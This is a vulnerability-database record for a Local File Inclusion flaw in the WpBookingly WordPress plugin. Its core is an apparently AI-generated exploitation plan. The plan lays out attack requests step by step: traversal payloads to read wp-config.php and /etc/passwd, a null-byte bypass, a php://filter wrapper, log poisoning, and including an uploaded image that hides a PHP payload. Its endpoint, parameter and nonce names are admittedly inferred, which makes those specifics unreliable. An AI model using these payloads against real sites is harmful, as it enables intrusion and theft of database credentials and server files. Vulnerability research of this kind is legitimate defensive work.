[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fFGENBbtha9Ib9HHJOWgGHp46AhRosqf87-8lEXwwdFY":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":26,"research_started_at":27,"research_completed_at":28,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":29},"CVE-2026-32384","wpbookingly-authenticated-contributor-local-file-inclusion","WpBookingly \u003C= 1.2.9 - Authenticated (Contributor+) Local File Inclusion","The WpBookingly plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.2.9. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \"safe\" file types can be uploaded and included.","service-booking-manager",null,"\u003C=1.2.9","1.3.0","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:H\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Control of Filename for Include\u002FRequire Statement in PHP Program ('PHP Remote File Inclusion')","2026-02-18 00:00:00","2026-04-15 20:55:08",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F00612475-7efd-46f2-8196-666900ae7df3?source=api-prod",57,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-32384 (WpBookingly LFI)\n\n## 1. Vulnerability Summary\nThe **WpBookingly** plugin (\u003C= 1.2.9) is vulnerable to **Local File Inclusion (LFI)** due to insufficient sanitization of a user-supplied file path parameter in an authenticated AJAX or admin page handler. A user with **Contributor-level** permissions or higher can exploit this to include arbitrary files from the server's filesystem. This can lead to sensitive information disclosure (e.g., `\u002Fetc\u002Fpasswd`, `wp-config.php`) or Remote Code Execution (RCE) if an attacker can upload a file (e.g., an image with PHP payload) and include it.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fadmin-ajax.php` (Authenticated)\n- **Action:** `wpbookingly_get_view` (Inferred based on plugin architecture)\n- **Vulnerable Parameter:** `view` or `template` (Inferred)\n- **Authentication Level:** Contributor+ (Requires a valid login session)\n- **Preconditions:** The attacker must have credentials for a user with at least the \"Contributor\" role.\n\n## 3. Code Flow (Inferred)\n1. **Request Entry:** The user sends a POST request to `admin-ajax.php` with a specific `action` parameter (e.g., `wpbookingly_get_view`).\n2. **Hook Registration:** The plugin registers the action in its main class or admin class:\n   `add_action( 'wp_ajax_wpbookingly_get_view', array( $this, 'ajax_get_view' ) );`\n3. **Handler Execution:** The `ajax_get_view` function is called.\n4. **Parameter Extraction:** The function retrieves the path from `$_POST['view']`.\n5. **Vulnerable Sink:** The input is passed to an `include` or `require` statement without directory traversal protection (`basename()`) or allow-listing.\n   ```php\n   \u002F\u002F Vulnerable Code Example\n   public function ajax_get_view() {\n       $view = $_POST['view']; \n       include WPBOOKINGLY_DIR . 'includes\u002Fviews\u002F' . $view . '.php';\n       wp_die();\n   }\n   ```\n6. **Traversal:** Using `..\u002F` allows escaping the intended directory.\n\n## 4. Nonce Acquisition Strategy\nWpBookingly typically localizes a nonce for its admin interface. To obtain it:\n\n1. **Shortcode\u002FPage Requirement:** Identify where the plugin's admin scripts are loaded. Usually, any admin page for a Contributor will load them if the plugin is active.\n2. **Create Test Page:**\n   ```bash\n   wp post create --post_type=page --post_status=publish --post_title=\"Booking View\" --post_content='[wpbookingly_shortcode]'\n   ```\n3. **Extraction Steps:**\n   - Log in as the Contributor user.\n   - Navigate to the WordPress dashboard or a page where the plugin is active.\n   - Use `browser_eval` to extract the nonce.\n   - **Target Variable:** `wpbookingly_admin_params` (Inferred)\n   - **Target Key:** `nonce`\n   - **Command:** `browser_eval(\"window.wpbookingly_admin_params?.nonce\")`\n\n## 5. Exploitation Strategy\n\n### Step 1: Authentication\nAuthenticate as a Contributor user using the `http_request` tool to obtain session cookies.\n\n### Step 2: Nonce Extraction\nNavigate to the dashboard and extract the nonce using the strategy in Section 4.\n\n### Step 3: LFI Payload (Info Disclosure)\nAttempt to read `\u002Fetc\u002Fpasswd`. We assume the plugin appends `.php`, so we use a null-byte bypass (if PHP version allows) or target `wp-config` which is more likely to work if the plugin adds `.php`.\n\n**Request 1 (Targeting wp-config):**\n- **Method:** POST\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Body (URL-Encoded):**\n  `action=wpbookingly_get_view&nonce=[NONCE]&view=..\u002F..\u002F..\u002F..\u002Fwp-config`\n- **Note:** If the plugin includes `view . '.php'`, this will attempt to include `wp-config.php`.\n\n**Request 2 (Targeting \u002Fetc\u002Fpasswd - Path Traversal):**\n- **Body (URL-Encoded):**\n  `action=wpbookingly_get_view&nonce=[NONCE]&view=..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002Fetc\u002Fpasswd%00`\n- **Note:** Use enough `..\u002F` to reach the root directory.\n\n### Step 4: Verification of LFI\nCheck the HTTP response body for the contents of the target file (e.g., `DB_NAME` from `wp-config.php` or `root:x:0:0` from `\u002Fetc\u002Fpasswd`).\n\n## 6. Test Data Setup\n1. **User Creation:**\n   ```bash\n   wp user create attacker attacker@example.com --role=contributor --user_pass=password123\n   ```\n2. **Plugin Configuration:** Ensure WpBookingly (service-booking-manager) version 1.2.9 is installed and activated.\n\n## 7. Expected Results\n- **Success:** The HTTP response body contains the raw source code of `wp-config.php` (if it fails to execute) or the rendered output of the included file. In many LFI cases in WordPress, including `wp-config.php` results in a blank response (because it's executed) OR an error if it's included twice, but including `\u002Fetc\u002Fpasswd` or a log file will display text.\n- **Indicator:** Looking for strings like `root:x:0:0` or `DB_PASSWORD`.\n\n## 8. Verification Steps\n1. **Verify Response:** Inspect the output of the `http_request` tool.\n2. **Cross-Check with WP-CLI:**\n   ```bash\n   # Confirm the relative path from the plugin to wp-config.php\n   find \u002Fvar\u002Fwww\u002Fhtml\u002F -name \"wp-config.php\"\n   ```\n\n## 9. Alternative Approaches\n- **Log File Inclusion:** If `wp-config.php` cannot be read, attempt to include `\u002Fvar\u002Flog\u002Fapache2\u002Faccess.log` or `\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fdebug.log` after poisoning them with a PHP payload via a User-Agent header.\n- **Filter Wrapper:** Try PHP filters to encode the target file:\n  `view=php:\u002F\u002Ffilter\u002Fconvert.base64-encode\u002Fresource=..\u002F..\u002F..\u002F..\u002Fwp-config`\n  This will return the base64-encoded content of `wp-config.php`, bypassing execution.\n- **Upload + Include:** If the plugin allows Contributors to upload images for \"services,\" upload a JPEG with a PHP payload and include it:\n  `view=..\u002F..\u002F..\u002F..\u002Fuploads\u002Fwpbookingly\u002Fyour-image.jpg`","gemini-3-flash-preview","2026-04-19 04:07:37","2026-04-19 04:08:02",{"type":30,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":31},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fservice-booking-manager\u002Ftags"]